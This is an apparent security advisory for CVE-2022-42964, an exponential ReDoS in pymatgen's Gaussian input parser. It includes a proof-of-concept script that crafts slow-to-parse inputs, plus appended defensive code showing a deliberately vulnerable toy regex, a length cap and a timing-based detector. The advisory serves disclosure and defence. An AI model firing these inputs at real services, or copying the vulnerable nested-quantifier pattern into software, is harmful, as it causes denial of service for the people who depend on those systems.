CVE-2022-42964: pymatgen ReDoS | XRAY-257184

An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the pymatgen PyPI package when an attacker is able to supply arbitrary input to the GaussianInput.from_string method.

CVE
#dos

CVE-2022-42964 | CVSS 5.9

JFrog Severity: medium

Published 15 Oct. 2022 | Last updated 15 Oct. 2022

Exponential ReDoS in pymatgen leads to denial of service

pymatgen


import time
from pymatgen.io.gaussian import GaussianInput

def str_and_from_string(i):
    # Minimal Gaussian input header: route section, title, charge/multiplicity.
    ans = """#P HF/6-31G(d) SCF=Tight SP

H4 C1

0 1
"""
    # A species line of i zeros followed by '!'; as described above, the time
    # spent in from_string grows exponentially with i.
    vulnerable_input = ans + 'C' + '0' * i + '!' + '\n'
    GaussianInput.from_string(vulnerable_input)

# Time the parse for growing i; the per-iteration time is the observable.
for i in range(1000):
    start = time.time()
    str_and_from_string(i)
    print(f"{i}: Done in {time.time() - start}")

No mitigations are supplied for this issue.
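Because the advisory supplies no mitigation, the following is an added example (not code from the advisory or from pymatgen) of two defender-side controls that apply to any exponential-backtracking parser: a length cap placed in front of the parser, which bounds worst-case parse time even when the regex itself cannot be changed, and a timing-growth check in the style of the PoC above that flags a parser whose run time grows far faster than its input. The regex patterns, the `MAX_INPUT_LEN` cap and the `toy_parse`/`safe_parse` functions are constructed stand-ins; the page does not show pymatgen's actual pattern, and the toy pattern only reproduces the nested-quantifier shape on inputs like `C000...0!`.

```python
import re
import time

# Constructed stand-in for a parser with a nested-quantifier regex (assumption:
# pymatgen's real pattern is not shown on the page). On 'C' + digits + '!' the
# engine tries every partition of the digit run before failing: 2^(n-1) tries.
VULNERABLE_PATTERN = re.compile(r"^C(?:\d+)+$")
# The same language written without the nested quantifier: backtracking is linear.
SAFE_PATTERN = re.compile(r"^C\d+$")

MAX_INPUT_LEN = 64  # constructed cap; set it to the longest legitimate line


def toy_parse(line: str) -> bool:
    """Stand-in for a vulnerable parser: a species label followed by digits."""
    return VULNERABLE_PATTERN.match(line) is not None


def safe_parse(line: str) -> bool:
    """Same check with a pattern that cannot backtrack exponentially."""
    return SAFE_PATTERN.match(line) is not None


def guarded_parse(parser, text: str, max_len: int = MAX_INPUT_LEN):
    """Length cap in front of a parser fed untrusted input.

    Exponential backtracking cost grows with input length, so bounding the
    length bounds the worst-case parse time while an upstream fix is pending.
    """
    if len(text) > max_len:
        raise ValueError(f"input of {len(text)} chars exceeds cap of {max_len}")
    return parser(text)


def malicious_line(n: int) -> str:
    """Same input shape as the PoC: label, n digits, then a char forcing failure."""
    return "C" + "0" * n + "!"


def _time_once(parser, text: str) -> float:
    start = time.perf_counter()
    parser(text)
    return time.perf_counter() - start


def measure_growth(parser, build_input, sizes, reps: int = 10):
    """Return [(n, best_seconds)] for parser(build_input(n)) over the sizes."""
    timings = []
    for n in sizes:
        text = build_input(n)
        best = min(_time_once(parser, text) for _ in range(reps))
        timings.append((n, best))
    return timings


def looks_exponential(timings, margin: float = 10.0) -> bool:
    """Flag when parse time grows far faster than the input length.

    A linear parser going from n1 to n2 chars slows by about n2/n1; a
    catastrophically backtracking one roughly doubles per extra character,
    so a ratio well beyond margin * (n2/n1) is the signal.
    """
    (n1, t1), (n2, t2) = timings[0], timings[-1]
    if t1 <= 0:
        t1 = 1e-9  # guard against timer resolution rounding to zero
    return t2 / t1 > margin * (n2 / n1)


if __name__ == "__main__":
    sizes = (8, 10, 12, 14)
    for name, parser in (("vulnerable", toy_parse), ("safe", safe_parse)):
        growth = measure_growth(parser, malicious_line, sizes)
        print(name, growth, "exponential:", looks_exponential(growth))
    try:
        guarded_parse(toy_parse, malicious_line(100))
    except ValueError as exc:
        print("rejected by length cap:", exc)
```

The sizes are kept small so the vulnerable pattern finishes in well under a second; the classifier compares the smallest and largest input rather than adjacent pairs, which makes it robust to timer noise on sub-microsecond measurements. In a real deployment the cap would sit in whatever code hands user-controlled Gaussian input to the library, and the growth check belongs in a test that guards against the pattern being reintroduced.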

NVD

Related news

GHSA-5jqp-885w-xj32: pymatgen is vulnerable to Regular Expression Denial of Service (ReDoS)
